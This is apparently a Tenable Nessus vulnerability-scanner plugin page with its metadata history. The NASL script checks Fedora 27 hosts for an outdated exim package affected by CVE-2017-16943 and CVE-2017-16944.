ID FEDORA_2017-0053BB9719.NASL Type nessus Reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-12-02T00:00:00
Description
This is an update fixing denial of service (CVE-2017-16944).
This is an update fixing use-after-free (CVE-2017-16943).
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.
#
include("compat.inc");
if (description)
{
  # Plugin identity and revision metadata.
  script_id(105803);
  script_version("3.4");
  script_cvs_date("Date: 2019/09/24 14:09:05");

  # CVEs covered, and the Fedora advisory the package checks were taken from.
  script_cve_id("CVE-2017-16943", "CVE-2017-16944");
  script_xref(name:"FEDORA", value:"2017-0053bb9719");

  script_name(english:"Fedora 27 : exim (2017-0053bb9719)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(attribute:"synopsis", value:"The remote Fedora host is missing a security update.");
  # Description text is copied verbatim from the Fedora update system.
  script_set_attribute(attribute:"description", value:
"This is an update fixing denial of service (CVE-2017-16944).
----
This is an update fixing use-after-free (CVE-2017-16943).
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues.");
  script_set_attribute(attribute:"see_also", value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719");
  script_set_attribute(attribute:"solution", value:"Update the affected exim package.");

  # Severity: CVSSv2/v3 base and temporal vectors; public exploit code is recorded as available.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # Classification: local (credentialed) check against the exim package on Fedora 27.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:exim");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:27");

  # Timeline: disclosure, vendor patch, and plugin release.
  script_set_attribute(attribute:"vuln_publication_date", value:"2017/11/25");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/12/12");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/01/15");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  # Needs SSH-collected local facts: release string and installed rpm list.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Host qualification: local checks must be enabled, the target must be
# Fedora 27, and its CPU must be one this plugin has package data for.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");

# Extract the major release number and require it to be exactly 27.
ver_match = pregmatch(pattern:"Fedora.*release ([0-9]+)", string:release);
if (isnull(ver_match)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = ver_match[1];
if (!preg(pattern:"^27([^0-9]|$)", string:os_ver))
  audit(AUDIT_OS_NOT, "Fedora 27", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Only x86_64 and i386-class hosts are covered; anything else is reported as not implemented.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (!("x86_64" >< cpu || cpu =~ "^i[3-6]86$"))
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
# Compare the installed exim package against the fixed Fedora 27 build.
vuln = 0;
if (rpm_check(release:"FC27", reference:"exim-4.89-7.fc27")) vuln++;

if (!vuln)
{
  # Nothing vulnerable: distinguish "patched" from "exim not installed".
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "exim");
}
else
{
  # Report the outdated package with the rpm comparison details.
  security_report_v4(port:0, severity:SECURITY_HOLE, extra:rpm_report_get());
  exit(0);
}
{"id": "FEDORA_2017-0053BB9719.NASL", "bulletinFamily": "scanner", "title": "Fedora 27 : exim (2017-0053bb9719)", "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "published": "2018-01-15T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/105803", "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "type": "nessus", "lastseen": "2019-12-13T07:04:30", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-01-16T20:31:32", "references": [{"idList": ["75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F"], "type": "freebsd"}, {"idList": ["1337DAY-ID-29068", "1337DAY-ID-29082"], "type": "zdt"}, {"idList": ["USN-3499-1", "USN-3493-1"], "type": "ubuntu"}, {"idList": 
["SSV:96896", "SSV:96905"], "type": "seebug"}, {"idList": ["ALAS-2017-932"], "type": "amazon"}, {"idList": ["PACKETSTORM:145152"], "type": "packetstorm"}, {"idList": ["ALA_ALAS-2017-932.NASL", "DEBIAN_DSA-4053.NASL", "EXIM_BDAT_CHUNK_UAF.NASL", "GENTOO_GLSA-201803-01.NASL", "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "UBUNTU_USN-3499-1.NASL", "FEDORA_2017-0032BAA7D7.NASL", "OPENSUSE-2017-1342.NASL", "UBUNTU_USN-3493-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DSA-4053-1:6BF76"], "type": "debian"}, {"idList": ["EDB-ID:43184"], "type": "exploitdb"}, {"idList": ["CVE-2017-16943", "CVE-2017-16944"], "type": "cve"}, {"idList": ["GLSA-201803-01"], "type": "gentoo"}, {"idList": ["OPENSUSE-SU-2017:3220-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310140539", "OPENVAS:1361412562310843388", "OPENVAS:1361412562310873919", "OPENVAS:1361412562310843380", "OPENVAS:1361412562310704053", "OPENVAS:1361412562310851658", "OPENVAS:1361412562310873907"], "type": "openvas"}, {"idList": ["THN:EE92331B07B64A7332ABABDA5C30ACC1"], "type": "thn"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "3fb38810eb51c49a78f8b02b7e863131be1b208a0b91e3a11808270356273abc", "hashmap": [{"hash": "cc82f834bb7cc4b7c64d263036c9ad35", "key": "description"}, {"hash": "1c2dca9e020487569e5aff0e7e150d79", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "86f676e5b21f32f64daf43dedf620470", "key": "href"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "140db532f722454444f5ad70cb0fb5d6", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": 
"be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2019-01-16T20:31:32", "modified": "2018-02-01T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/02/01 15:56:50 $\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", 
value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 : exim (2017-0053bb9719)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 5, "lastseen": "2019-01-16T20:31:32"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {"score": {"modified": "2018-01-16T00:58:15", "value": 7.5}}, "hash": "2ca21d4b5205dfc513862eea8d9672d36e5914db7fc049dff1c8c82c0ed208ec", "hashmap": [{"hash": "c022d6815c4b53bbbb8f6fdecc78a222", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "modified"}, {"hash": 
"9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "807b989fc0fd88b08ac40c39e09cac5e", "key": "description"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "86f676e5b21f32f64daf43dedf620470", "key": "href"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2018-01-16T00:58:15", "modified": "2018-01-15T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2018/01/15 14:56:00 $\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 
value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 : exim (2017-0053bb9719)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2018-01-16T00:58:15"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-10-28T20:11:58", "references": [{"idList": ["75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F"], "type": "freebsd"}, {"idList": ["1337DAY-ID-29068", "1337DAY-ID-29082"], "type": "zdt"}, {"idList": ["USN-3499-1", "USN-3493-1"], "type": "ubuntu"}, {"idList": ["SSV:96896", "SSV:96905"], "type": "seebug"}, {"idList": ["ALAS-2017-932"], "type": "amazon"}, {"idList": 
["PACKETSTORM:145152"], "type": "packetstorm"}, {"idList": ["ALA_ALAS-2017-932.NASL", "DEBIAN_DSA-4053.NASL", "EXIM_BDAT_CHUNK_UAF.NASL", "GENTOO_GLSA-201803-01.NASL", "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "UBUNTU_USN-3499-1.NASL", "FEDORA_2017-0032BAA7D7.NASL", "OPENSUSE-2017-1342.NASL", "UBUNTU_USN-3493-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DSA-4053-1:6BF76"], "type": "debian"}, {"idList": ["EDB-ID:43184"], "type": "exploitdb"}, {"idList": ["CVE-2017-16943", "CVE-2017-16944"], "type": "cve"}, {"idList": ["GLSA-201803-01"], "type": "gentoo"}, {"idList": ["OPENSUSE-SU-2017:3220-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310140539", "OPENVAS:1361412562310843388", "OPENVAS:1361412562310873919", "OPENVAS:1361412562310843380", "OPENVAS:1361412562310704053", "OPENVAS:1361412562310851658", "OPENVAS:1361412562310873907"], "type": "openvas"}, {"idList": ["THN:EE92331B07B64A7332ABABDA5C30ACC1"], "type": "thn"}]}, "score": {"modified": "2019-10-28T20:11:58", "value": 7.6, "vector": "NONE"}}, "hash": "c12cae71e5ae68514aca98f97bd347e9cb2a5683e530795e0013c5036d758121", "hashmap": [{"hash": "5b0aef06cc449031985b7ee781024ce7", "key": "sourceData"}, {"hash": "cc82f834bb7cc4b7c64d263036c9ad35", "key": "description"}, {"hash": "9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "0975adf19adb993cc2dc44ea6b27d31e", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "485c41a48047d23b0282ee19ec1cc5f9", "key": "href"}, {"hash": 
"0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2019-10-28T20:11:58", "modified": "2019-10-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/24 14:09:05\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected 
exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 : exim (2017-0053bb9719)", "type": "nessus", "viewCount": 3}, "differentElements": ["modified"], "edition": 7, "lastseen": "2019-10-28T20:11:58"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "d4b56ebcbf447c66c5ecca5e179b5722c0f6c6ef0e2175c1d80a9d551ddd1fdf", "hashmap": [{"hash": "1c2dca9e020487569e5aff0e7e150d79", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "807b989fc0fd88b08ac40c39e09cac5e", "key": 
